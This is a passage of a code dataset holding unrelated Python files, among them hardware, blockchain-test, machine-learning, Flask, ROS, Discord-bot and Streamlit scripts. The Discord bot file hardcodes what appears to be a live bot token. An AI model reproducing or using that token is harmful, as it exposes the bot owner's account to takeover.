ct.create_template('九宫格ce2',\"https://display.adhudong.com/new/nineBlockBox.html\",template_conf_items=r'''背景(750*1206)|bg|image||1|\\n\r\n# 全屏底色|bodyBgColor|string||0|\\n\r\n# 剩余次数文字颜色|leftTimesColor|string||0|/n\r\n# 剩余次数数字颜色|leftTimesNumColor|string||0|)''')\r\n # #创建活动, create_act(self, act_name,free_num=20, award_num=6)\r\n # ct.create_act()\r\n # #创建活动关联的奖品,\r\n # ct.create_awards()\r\n","sub_path":"business_modle/querytool/create_template.py","file_name":"create_template.py","file_ext":"py","file_size_in_byte":16467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529783187","text":"#!/usr/bin/env python\n\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM) # use GPIO Number\n\nBZ1 = 13 # BZ1 --> GPIO13\nGPIO.setup(BZ1, GPIO.OUT) # set GPIO13 output\n\nbuzzer = GPIO.PWM(BZ1, 1000) # set BZ1 1000 Hz\n\nbuzzer.start(50) # start BZ1 duty 50%\nprint(\" buzzer 1000 Hz ,duty 50 %\")\ntime.sleep(3)\n\nbuzzer.ChangeFrequency(500) # change frequency 500 Hz\nprint(\" change 500 Hz \")\ntime.sleep(3)\n\nbuzzer.ChangeDutyCycle(10) # change duty cycle 10 %\nprint(\" duty 10 % \")\ntime.sleep(3)\n\nbuzzer.stop() # stop buzzer\nGPIO.cleanup()\n\n","sub_path":"python/buzzur/bz_sample1.py","file_name":"bz_sample1.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619182044","text":"#!/usr/bin/python3\n\nfrom brownie import *\nfrom scripts.deployment import main\n\n\ndef setup():\n config['test']['always_transact'] = False\n main(NFToken)\n global token, issuer\n token = NFToken[0]\n issuer = IssuingEntity[0]\n\n\ndef mint_issuer():\n '''mint to issuer'''\n token.mint(issuer, 1000, 0, \"0x00\", {'from': a[0]})\n _check_countries()\n token.mint(issuer, 9000, 0, \"0x00\", {'from': a[0]})\n _check_countries()\n\ndef burn_issuer():\n '''burn from issuer'''\n token.mint(issuer, 10000, 0, \"0x00\", {'from': a[0]})\n token.burn(1, 2001, {'from': a[0]})\n _check_countries()\n token.burn(2001, 10001, {'from': a[0]})\n _check_countries()\n\n\ndef mint_investors():\n '''mint to investors'''\n _check_countries()\n token.mint(a[1], 1000, 0, \"0x00\", {'from': a[0]})\n _check_countries(one=(1, 1, 0))\n token.mint(a[1], 1000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[2], 1000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[3], 1000, 0, \"0x00\", {'from': a[0]})\n _check_countries(one=(2, 1, 1), two=(1, 1, 0))\n token.mint(a[1], 996000, 0, \"0x00\", {'from': a[0]})\n _check_countries(one=(2, 1, 1), two=(1, 1, 0))\n\ndef burn_investors():\n '''burn from investors'''\n token.mint(a[1], 5000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[2], 3000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[3], 2000, 0, \"0x00\", {'from': a[0]})\n token.burn(1, 1001, {'from': a[0]})\n _check_countries(one=(2, 1, 1), two=(1, 1, 0))\n token.burn(1001, 5001, {'from': a[0]})\n _check_countries(one=(1, 0, 1), two=(1, 1, 0))\n token.burn(5001, 8001, {'from': a[0]})\n token.burn(8001, 10001, {'from': a[0]})\n _check_countries()\n\ndef _check_countries(one=(0,0,0),two=(0,0,0),three=(0,0,0)):\n check.equal(\n issuer.getInvestorCounts()[0][:3],\n (\n one[0]+two[0]+three[0],\n one[1]+two[1]+three[1],\n one[2]+two[2]+three[2]\n )\n )\n check.equal(issuer.getCountry(1)[1][:3], one)\n check.equal(issuer.getCountry(2)[1][:3], two)\n check.equal(issuer.getCountry(3)[1][:3], three)","sub_path":"tests/nft/mint_burn/investor_counts.py","file_name":"investor_counts.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"317447446","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 6 19:11:40 2019\n\n@author: rhari\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndiabetes=pd.read_csv('Diabetes.csv')\ndiabetes.columns\ndiabetes.head\ndiabetes.describe()\nfeature_names=['Pregnancies','Glucose','BloodPressure','SkinThickness','Insulin','BMI','DiabetesPedigreeFunction','Age']\nX=diabetes[feature_names]\ny=diabetes.Outcome\n\nprint(\"Diabetes data set dimensions:{}\".format(diabetes.shape))\n\n#Visualising the dataset\ncorr=diabetes.corr()\nprint(corr)\nsns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns)\n\nsns.countplot(x=diabetes['Age'])\nsns.countplot(x=diabetes['Age'], hue=diabetes['Outcome'])\nsns.countplot(diabetes['Outcome'])\n\nplt.scatter(diabetes['Age'], diabetes['BMI'])\nplt.xlabel('Age')\nplt.ylabel('BMI')\nplt.show()\n\ndiabetes.groupby('Outcome').size()\ndiabetes.hist(bins=50, figsize=(20,15))\nplt.show()\n\n#Data cleaning\ndiabetes.isnull().sum()\ndiabetes.isna().sum()\n\nmedian_bmi=diabetes['BMI'].median()\ndiabetes['BMI']=diabetes['BMI'].replace(to_replace=0, value=median_bmi)\n\nmedian_bloodp=diabetes['BloodPressure'].median()\ndiabetes['BloodPressure']=diabetes['BloodPressure'].replace(to_replace=0, value=median_bloodp)\n\nmedian_gluc=diabetes['Glucose'].median()\ndiabetes['Glucose']=diabetes['Glucose'].replace(to_replace=0, value=median_gluc)\n\nmedian_skin=diabetes['SkinThickness'].median()\ndiabetes['SkinThickness']=diabetes['SkinThickness'].replace(to_replace=0, value=median_skin)\n\nmedian_ins=diabetes['Insulin'].median()\ndiabetes['Insulin']=diabetes['Insulin'].replace(to_replace=0, value=median_ins)\n\n#Feature selection\nfrom sklearn.feature_selection import SelectKBest, chi2\nfeature_ranking=SelectKBest(chi2, k=5)\nfit=feature_ranking.fit(X,y)\nfmt = '%-8s%-20s%s'\n\nprint(fmt % ('', 'Scores', 'Features'))\nfor i, (score, feature) in enumerate(zip(feature_ranking.scores_, X.columns)):\n print(fmt % (i, score, feature))\n \nplt.bar(feature_names ,feature_ranking.scores_)\nplt.xlabel('Features', color='red')\nplt.ylabel('Feature Score', color='red')\nplt.show()\n\n#Splitting\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test= train_test_split(X,y, stratify=diabetes.Outcome, random_state=0)\nnames=[]\nscores=[]\n\n#Model Selection\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import accuracy_score\n\n#Applying K-Nearest Neighbors Model\nfrom sklearn.neighbors import KNeighborsClassifier\nclassifier1=KNeighborsClassifier()\nclassifier1.fit(X_train, y_train)\ny_pred=classifier1.predict(X_test)\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append(\"K-Nearest Neighbor\")\n\n#Applying Naive Bayes Model\nfrom sklearn.naive_bayes import GaussianNB\nclassifier2=GaussianNB()\nclassifier2.fit(X_train,y_train)\ny_pred=classifier2.predict(X_test)\n\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test,y_pred))\nnames.append(\"Naive Bayes\")\n\n#Applying Logistic Regression Model\nfrom sklearn.linear_model import LogisticRegression\nclassifier3=LogisticRegression()\nclassifier3.fit(X_train, y_train)\ny_pred=classifier3.predict(X_test)\n\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append(\"Logistic Regression\")\n\n#Applying Decision Tree Model\nfrom sklearn.tree import DecisionTreeClassifier\nclassifier4=DecisionTreeClassifier(random_state=0)\nclassifier4.fit(X_train, y_train)\ny_pred=classifier4.predict(X_test)\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append('Decision Tree')\n\n#Applying Random Forest Model\nfrom sklearn.ensemble import RandomForestClassifier\nrf=RandomForestClassifier(n_estimators=100, random_state=0)\nrf.fit(X_train, y_train)\ny_pred=rf.predict(X_test)\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append('Random Forest')\n\nFinal=pd.DataFrame({'Name':names,'Score':scores})\nprint(Final)\n\naxis=sns.barplot(x='Name', y='Score', data=Final)\naxis.set(xlabel='Model',ylabel='Accuracy')\n\nfor p in axis.patches:\n height=p.get_height()\n axis.text(p.get_x()+p.get_width()/2,height+0.005,'{:1.4f}'.format(height), ha=\"center\")\nplt.show()\n\n\n\n\n\n","sub_path":"Machine_Learning/Project/Report_18BCE1010/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259690710","text":"from flask import Flask , render_template, request, session\n# the above sessin is the native session that store cookies in client side\n\n# the session below is the flask flask session, extension in flask that store info in the server side\nfrom flask_session import Session\n\n\napp = Flask(__name__)\n\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession (app)\n\n# notes = []\n\n\n@app.route('/', methods=[\"GET\",\"POST\"])\ndef index():\n\t# return \"Hello, World!\n\n\t# headline = \"My page!\"\n\n\t# return render_template('index.html', headline=headline)\n\t# names = ['Alice','Bob', 'Chalie', 'David', 'Hung Om']\n\n\t# return render_template('index.html')\n\t# session[\"notes\"] = []\n\n\tif session.get(\"notes\") is None:\n\t\t# if there is no session stored in the note session the empty list is created to begin.\n\t\tsession[\"notes\"] = []\n\n\tif request.method == \"POST\":\n\t\t# if the session is post(new note is added)\n\t\tnote = request.form.get(\"note\")\n\t\t# this line will get the data(note in the form)\n\t\t# add in the session by appending it in the list\n\t\tsession[\"notes\"].append(note)\n\n\treturn render_template(\"index.html\", notes=session[\"notes\"])\n\n@app.route('/more')\ndef more():\n\treturn render_template('more.html')\n\n\n\n# @app.route('/hello', methods=[\"GET\",\"POST\"])\n# def hello():\n# \tif request.method==\"GET\":\n# \t\treturn \"Please submit the form intead.\"\n# \telse:\n# \t\tname = request.form.get(\"name\")\n# \t\treturn render_template(\"hello.html\", name=name)\n\n\n\n\n# @app.route('/david')\n\n# def david():\n# \treturn \"Hello , David!\"\n\n# @app.route('/maria')\n# def maria():\n# # \treturn \"Hello Maria!\"\n\n# @app.route('/')\n# def hello(name):\n# \treturn \"hello , {}!\".format(name)","sub_path":"CS50-Exercises/Flask/app/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"112326134","text":"import pytest\nfrom requests import post, get\n\nserver_url = 'http://localhost:5000'\n\ndef pytest_namespace():\n return {\n 'newly_created_user_id': None\n }\n\ndef test_user_create_account():\n params = {\n 'email': 'aasdfaagfhfsafasd@mail.com', \n 'password': 'JOHNSON',\n 'first_name': 'Boris',\n 'last_name':'Johnson',\n }\n api_url = server_url + '/user/create-account'\n\n response = post(api_url, json = params)\n print(\"DEBUG\")\n print(response.text)\n pytest.newly_created_user_id = response.json()[\"_id\"]\n assert response.status_code == 200\n\n response = post(api_url, json = params)\n assert response.status_code == 400\n\n\ndef test_user_info_edit():\n params = {\n 'account_id': pytest.newly_created_user_id, \n 'email': 'Johnson@mail.com', \n 'password': \"JOHNSON\", \n 'first_name': 'Jack', \n 'last_name': 'Biden',\n }\n api_url = server_url + '/user/update-account-info'\n\n response = post(api_url, json = params)\n assert response.status_code == 200\n\n params = {\n 'account_id': pytest.newly_created_user_id\n }\n\n api_url = server_url + '/login/get-account-info'\n\n response = post(api_url, json = params)\n assert response.status_code == 200\n assert response.json()['email'] == 'Johnson@mail.com'\n assert response.json()['first_name'] == 'Jack'\n assert response.json()['last_name'] == 'Biden'\n\n\ndef test_user_delete():\n params = {\n 'description': 'This pair of Chinese republic period miniature porcelain vases',\n 'item_name': 'Pair Chinese Republic', \n 'seller_id': pytest.newly_created_user_id, \n 'starting_price': 500.0, \n 'auction_start_time': 1606432462, \n 'auction_end_time': 1606583144, \n 'category_id': 9,\n 'condition': 2,\n 'image_url': \"https://www.flaticon.com/svg/static/icons/svg/914/914832.svg\",\n 'shipping_cost': 7.99\n }\n api_url = server_url + '/item/create-item'\n response = post(api_url, json = params)\n newly_created_item_id = response.json()[\"item_id\"]\n assert response.status_code == 200\n\n\n params = {\n 'account_id': pytest.newly_created_user_id\n }\n api_url = server_url + '/user/delete-account'\n\n response = post(api_url, json = params)\n assert response.status_code == 200\n \n response = post(api_url, json = params)\n assert response.status_code == 400\n\n params = {\n 'item_id': newly_created_item_id\n }\n\n api_url = server_url + '/item/get-item-info'\n response = post(api_url, json = params)\n record = response.json()\n assert response.status_code == 400\n\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544913798","text":"import discord\nimport asyncio\nfrom discord import Guild, message, Member, User\n\nimport os\nimport sys\n\nclient = discord.Client()\n\n###############################################################################################\n\n# DEFAULT: 0,\n# AQUA: 1752220,\n# GREEN: 3066993,\n# BLUE: 3447003,\n# PURPLE: 10181046,\n# GOLD: 15844367,\n# ORANGE: 15105570,\n# RED: 15158332,\n# GREY: 9807270,\n# DARKER_GREY: 8359053,\n# NAVY: 3426654,\n# DARK_AQUA: 1146986,\n# DARK_GREEN: 2067276,\n# DARK_BLUE: 2123412,\n# DARK_PURPLE: 7419530,\n# DARK_GOLD: 12745742,\n# DARK_ORANGE: 11027200,\n# DARK_RED: 10038562,\n# DARK_GREY: 9936031,\n# LIGHT_GREY: 12370112,\n# DARK_NAVY: 2899536,\n# LUMINOUS_VIVID_PINK: 16580705,\n# DARK_VIVID_PINK: 12320855\n\n################################################################################################\n\nautoroles = {\n 718493315405840495: {'memberroles': [719112492881674260], 'botroles': [718793348688773220]}\n\n}\n\n\n@client.event\nasync def on_ready():\n print('Der Bot ist eingeloggt als User -> {}'.format(client.user.name))\n client.loop.create_task(status_task())\n\n\nasync def status_task():\n while True:\n await client.change_presence(activity=discord.Game('⋙ Vision Crapter ⋘'), status=discord.Status.online)\n await asyncio.sleep(5)\n await client.change_presence(activity=discord.Game('》+help《'), status=discord.Status.online)\n await asyncio.sleep(5)\n\n\n@client.event\nasync def on_member_join(member):\n guild: Guild = member.guild\n if not member.bot:\n channel = discord.utils.get(member.guild.channels, name=\"\") # <--- Channel-Name\n embed = discord.Embed(title=\"⋙ Form-Writer ⋘\", color=1752220)\n\n embed.set_footer(text=\"[]\")\n embed.set_thumbnail(url=f\"{member.avatar_url}\")\n mess = await channel.send(embed=embed)\n guild: Guild = member.guild\n\n autoguild = autoroles.get(member.guild.id)\n if autoguild and autoguild['memberroles']:\n for roleId in autoguild['memberroles']:\n role = guild.get_role(roleId)\n if role:\n await member.add_roles(role, reason='AutoRoles', atomic=True)\n else:\n autoguild = autoroles.get(member.guild.id)\n if autoguild and autoguild['botroles']:\n for roleId in autoguild['botroles']:\n role = guild.get_role(roleId)\n if role:\n await member.add_roles(role, reason='AutoRoles', atomic=True)\n\n@client.event\nasync def on_message(message):\n if message.content.startswith('!userinfo'):\n args = message.content.split(' ')\n if len(args) == 2:\n member: Member = discord.utils.find(lambda m: args[1] in m.name, message.guild.members)\n if member:\n embed = discord.Embed(title='Userinfo für {}'.format(member.name),\n description='Dies ist eine Userinfo für den User {}'.format(member.mention),\n color=0x22a7f0)\n embed.add_field(name='Server beigetreten', value=member.joined_at.strftime('%d/%m/%Y, %H:%M:%S'),\n inline=True)\n embed.add_field(name='Discord beigetreten', value=member.created_at.strftime('%d/%m/%Y, %H:%M:%S'),\n inline=True)\n rollen = ''\n for role in member.roles:\n if not role.is_default():\n rollen += '{} \\r\\n'.format(role.mention)\n if rollen:\n embed.add_field(name='Rollen', value=rollen, inline=True)\n embed.set_thumbnail(url=member.avatar_url)\n embed.set_footer(text='Ich bin ein EmbedFooter.')\n mess = await message.channel.send(embed=embed)\n\n\n\nclient.run(\"NzI0NjA4OTc2MjU1MzIwMTI1.XvCqxg.guGIfv2NjQBuNpsOzaW-exwtAcM\")\n","sub_path":"puplicbot.py","file_name":"puplicbot.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48815200","text":"class Queens(object):\n __slots__ = ('__nqueens')\n\n def __init__(self, nqueens):\n assert isinstance(nqueens, int) and nqueens > 0, \\\n 'An positive integer is required here.'\n self.__nqueens = nqueens\n \n def __conflict(self, nextY, states):\n nextX = len(states)\n for stateX, stateY in enumerate(states):\n if abs(nextY - stateY) in (0, nextX - stateX):\n return True\n return False\n \n def __queens(self, nqueens, states=()):\n for nextY in range(self.__nqueens):\n if not self.__conflict(nextY, states):\n if len(states) + 1 == self.__nqueens:\n yield (nextY,)\n else:\n for result in self.__queens(nqueens, states + (nextY,)):\n yield (nextY,) + result\n\n def __iter__(self):\n return self.__queens(self.__nqueens)\n","sub_path":"python/queens.py","file_name":"queens.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332367542","text":"from typing import List\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n count=0\n if(len(preorder)>0):\n node=TreeNode(preorder[count])\n ind=inorder.index(preorder[count])\n rig=inorder[ind+1:]\n lef=inorder[:ind]\n def insert_right(root,right,y):\n no=None\n index=None\n for i in preorder[y+1:]:\n if(i in right):\n no=i\n index=right.index(no)\n break\n while(root.right is not None):\n root=root.right\n root.right=TreeNode(no)\n le=right[:index]\n ri=right[index+1:]\n if(len(le)>0):\n insert_left(root.right,le,y+1)\n if(len(ri)>0):\n insert_right(root.right,ri,y+1)\n\n\n\n def insert_left(root,left,y):\n no=None\n inde=None\n for i in preorder[y+1:]:\n if(i in left):\n no=i\n index=left.index(no)\n break\n while(root.left is not None):\n root=root.left\n root.left=TreeNode(no)\n le=left[:index]\n ri=left[index+1:]\n if(len(le)>0):\n insert_left(root.left,le,y+1)\n if(len(ri)>0):\n insert_right(root.left,ri,y+1)\n\n\n if(len(lef)>0):\n insert_left(node,lef,count)\n if(len(rig)>0):\n insert_right(node,rig,count)\n\n return node\n\n\n\n","sub_path":"problem_106.py","file_name":"problem_106.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314339732","text":"#!/usr/bin/env python3\n\n\"\"\"\ntest_onboard_router - unit tests for onboard_router.py\noffline tests - not requiring the ROS node itself to run.\n\n\"\"\"\n\n\nimport os\n\nimport pytest\nimport rospkg\nfrom std_msgs.msg import Bool\n\nfrom interactivespaces_msgs.msg import GenericMessage\nfrom lg_msg_defs.msg import StringArray\nfrom lg_keyboard import OnboardRouter\n\n\nDIRECTOR_MESSAGE_NO_WINDOWS = \"\"\"\n {\n \"description\": \"bogus\",\n \"duration\": 0,\n \"name\": \"test whatever\",\n \"resource_uri\": \"bogus\",\n \"slug\": \"test message\"\n }\"\"\"\n\nDIRECTOR_MESSAGE = \"\"\"\n {\n \"description\": \"bogus\",\n \"duration\": 0,\n \"name\": \"test whatever\",\n \"resource_uri\": \"bogus\",\n \"slug\": \"test message\",\n \"windows\": [\n {\n \"activity\": \"mirror\",\n \"height\": 1080,\n \"presentation_viewport\": \"center\",\n \"assets\": [\n ],\n \"width\": 450,\n \"height\": 800,\n \"x_coord\": 0,\n \"y_coord\": 0,\n\n \"activity_config\": {\n \"viewport\": \"center\",\n \"route_touch\": true\n }\n }\n ]\n }\"\"\"\n\n\nclass MockActivatePublisher(object):\n\n def __init__(self):\n self.msgs = []\n\n def publish(self, msgs):\n self.msgs.append(msgs)\n\n\nclass TestOnboardRouter(object):\n\n def setUp(self):\n self.publisher = MockActivatePublisher()\n self.msg = GenericMessage()\n self.msg.type = \"json\"\n self.router = OnboardRouter(default_viewport=[\"wall\"],\n onboard_activate_publisher=self.publisher)\n\n def test_handle_scene_no_windows(self):\n \"\"\"\n Upon sending a director message with no windows defined,\n the router publishes empty StringArray\n\n \"\"\"\n self.msg.message = DIRECTOR_MESSAGE_NO_WINDOWS\n self.router.handle_scene(self.msg)\n assert self.publisher.msgs[0].strings == []\n\n def test_hand_scene_with_windows(self):\n \"\"\"\n Upon sending a director message with windows,\n the onboard shall first be shut.\n Assert on correct viewports settings.\n\n \"\"\"\n self.msg.message = DIRECTOR_MESSAGE\n assert self.router.default_viewport == self.router.active_viewport == [\"wall\"]\n self.router.handle_scene(self.msg)\n assert self.publisher.msgs[0].strings == []\n assert self.router.active_viewport == [\"center\"]\n\n def test_handle_visibility_hide_onboard(self):\n msg = Bool(data=False)\n assert self.router.last_state is None\n self.router.handle_visibility(msg)\n assert self.router.last_state is False\n assert self.publisher.msgs[0].strings == []\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n # check that repeatedly sending messages of the same value\n # won't get processed multiple times but only once\n for _ in range(10):\n self.router.handle_visibility(msg)\n assert self.router.last_state is False\n assert self.publisher.msgs[0].strings == []\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n\n def test_handle_visibility_show_onboard(self):\n msg = Bool(data=True)\n assert self.router.last_state is None\n self.router.handle_visibility(msg)\n assert self.router.last_state is True\n assert self.publisher.msgs[0].strings == [\"wall\"]\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n # check that repeatedly sending messages of the same value\n # won't get processed multiple times but only once\n for _ in range(10):\n self.router.handle_visibility(msg)\n assert self.router.last_state is True\n assert self.publisher.msgs[0].strings == [\"wall\"]\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n\n\nif __name__ == \"__main__\":\n test_pkg = \"lg_keyboard\"\n test_name = \"test_onboard_router\"\n test_dir = os.path.join(rospkg.get_test_results_dir(env=None), test_pkg)\n pytest_result_path = os.path.join(test_dir, \"rosunit-%s.xml\" % test_name)\n # run only itself\n test_path = os.path.abspath(os.path.abspath(__file__))\n pytest.main(\"-vv -rfsX -s --junit-xml=%s %s\" % (pytest_result_path, test_path))\n","sub_path":"lg_keyboard/test/offline/test_onboard_router.py","file_name":"test_onboard_router.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647370975","text":"from flask import Flask\nfrom flask_assistant import Assistant, ask, tell\n\napp = Flask(__name__)\nassist = Assistant(app)\n\nred_price = 90\ngreen_price =120\n\ndef checkout(x, y):\n checkout = x * red_price + y * green_price\n return checkout\n\n@assist.action('Default Welcome Intent')\ndef greet_and_start():\n speech = \"いらっしゃい、赤りんごと青りんごがおすすめですよ。\"\n return ask(speech)\n\n@assist.action('CalcIntent',mapping={'num_1': 'number_1','num_2': 'number_2','red_apple': 'list_of_red','green_apple': 'list_of_green'})\ndef calc(num_1,num_2,red_apple,green_apple):\n if not red_apple == \"赤りんご\":\n checkout_all = int(num_2) * green_price\n speech = '{}{}個でお会計{}円になります'.format(green_apple,num_2,checkout_all)\n return tell(speech)\n elif not green_apple == \"青りんご\":\n checkout_all = int(num_1) * red_price\n speech = '{}{}個でお会計{}円になります'.format(red_apple,num_1,checkout_all)\n return tell(speech)\n else:\n checkout_all = checkout(int(num_1) ,int(num_2))\n speech = '{}{}個と{}{}個でお会計{}円になります'.format(red_apple,num_1,green_apple,num_2,checkout_all)\n return tell(speech)\n\nif __name__ == '__main__':\n app.run(host=\"127.0.0.1\", port=5000)\n","sub_path":"Chapter3/proto_g_calc.py","file_name":"proto_g_calc.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154184797","text":"import streamlit as st\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure, text\nimport pandas as pd\nimport requests\n\nurl = \"https://docs.google.com/spreadsheets/d/1uo_oC3HfWpbV1FDQjrVdNyxgsEzDFs7qV3IUPa9N4kQ/edit#gid=0\"\nsheet_url = \"https://docs.google.com/spreadsheets/d/1uo_oC3HfWpbV1FDQjrVdNyxgsEzDFs7qV3IUPa9N4kQ/edit#gid=0\"\nurl_1 = sheet_url.replace( '/edit#gid=', '/export?format=csv&gid=')\n\nst.title(\"Christie Pavey's Council App\")\n\ndf = pd.read_csv(url_1)\n\n\ncouncils = df[\"council\"].values.tolist()\ncouncils = list(set(councils))\nall_data = {}\nfor item in councils:\n all_data[item] = []\n\nfor index, row in df.iterrows():\n all_data[row['council']].append(row['person'])\npeople = df[\"person\"].values.tolist()\npeople = list(set(people))\nperson_data = {}\nfor item in people:\n person_data[item] = []\nfor index, row in df.iterrows():\n person_data[row['person']].append(row['council'])\n\nnew_people = [\"councils\"]+people\neverything = {}\neverything2 = []\nfor council in councils:\n temp = [council]\n temp2 = {\"councils\": council}\n for person in people:\n if person in all_data[council]:\n temp.append(1)\n temp2[person] = 1\n else:\n temp.append(0)\n temp2[person] = 0\n everything[council] = temp\n everything2.append(temp2)\nnew_df = pd.DataFrame(columns=new_people)\nnew_df = new_df.append(everything2)\nfrom collections import Counter\nimport operator\ndef find_groups(min_occurences):\n total = 0\n groupings = []\n for person in people:\n council_matches = []\n pairs = []\n counter = 0\n for council in all_data:\n for person2 in people:\n if person2 != person:\n if person2 in all_data[council] and person in all_data[council]:\n pairs.append((person, person2))\n council_matches.append(council)\n pairs = Counter(pairs)\n x=0\n for pair in pairs:\n x=x+1\n if pairs[pair] > min_occurences-1:\n counter += 1\n groupings.append(pair)\n total += counter\n final = []\n for group in groupings:\n sorted_list = tuple(sorted(group))\n final.append(sorted_list)\n final = list(set(final))\n\n return (len(final), final)\ndef find_max_overlap(min_occurences):\n total = 0\n groupings = []\n for person in people:\n pairs = []\n counter = 0\n for council in all_data:\n council_matches = []\n for person2 in people:\n if person2 != person:\n for person3 in people:\n if person3 !=person and person3 != person2:\n if person2 in all_data[council] and person in all_data[council] and person3 in all_data[council]:\n pairs.append((person, person2, person3))\n council_matches.append(council)\n pairs = Counter(pairs)\n x=0\n for pair in pairs:\n x=x+1\n if pairs[pair] > min_occurences-1:\n counter += 1\n groupings.append(pair)\n total += counter\n final = []\n for group in groupings:\n sorted_list = tuple(sorted(group))\n final.append(sorted_list)\n final = list(set(final))\n return (len(final), final)\noption = st.selectbox(\n 'Search for Group of:',\n ('Pairs', 'Triplets'))\nsearch = int(st.text_input(\"Enter Number of Councils Pairs appear at Councils:\"))\nif option == \"Pairs\":\n quantity, hits = find_groups(search)\n grouping = \"pairs\"\nelse:\n quantity, hits = find_max_overlap(search)\n grouping = \"triplets\"\n\nst.text(f\"There are {quantity} examples of {grouping} that appear at councils {search} times together. They are:\")\nfor hit in hits:\n if grouping == \"pairs\":\n st.text(f\"{hit[0]} and {hit[1]}\")\n else:\n st.text(f\"{hit[0]}, {hit[1]} and {hit[2]}\")\nG = nx.Graph()\ndf1 = df[['council', 'person']]\nG = nx.from_pandas_edgelist(df1, 'council', 'person')\ncolor_map = []\n\nfor node in G:\n if node in df[\"council\"].values:\n color_map.append(\"coral\")\n else:\n color_map.append(\"darkseagreen\")\nd = nx.degree(G)\nd = [(d[node]+1) * 40 for node in G.nodes()]\nimport math\npos = nx.spring_layout(G, k=10/math.sqrt(G.order()))\nfrom matplotlib.pyplot import figure\nfig = figure(figsize=(30, 30))\ndata = nx.draw_networkx(G, node_color=color_map, with_labels=True, node_size=d, font_size=12)\nplt.savefig(\"temp.png\")\nst.image(\"temp.png\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"90355176","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\nclass Sale_field(models.Model):\n\n _inherit='account.invoice'\n\n aref = fields.Reference([('sale_order', 'String')])\n x_OrdenCompra = fields.Char(string='Orden de Compra', compute=\"_orden_agregar\")\n\n @api.multi\n @api.depends('origin')\n def _orden_agregar(self):\n for record in self:\n \trecord['x_OrdenCompra'] = self.env['sale.order'].search([('name', '=', record.origin)]).x_ordendecompra\n","sub_path":"sale_field/model/invoice_field.py","file_name":"invoice_field.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25547647","text":"from flask import Blueprint, request\nfrom apikit import request_data, jsonify, Pager\nfrom sqlalchemy import or_\n\nfrom aleph import authz\nfrom aleph.model import db, CrawlerState\nfrom aleph.crawlers import get_exposed_crawlers, execute_crawler\n\nblueprint = Blueprint('crawlers_api', __name__)\n\n\n@blueprint.route('/api/1/crawlers', methods=['GET'])\ndef index():\n authz.require(authz.is_admin())\n crawlers = list(get_exposed_crawlers())\n return jsonify(Pager(crawlers, 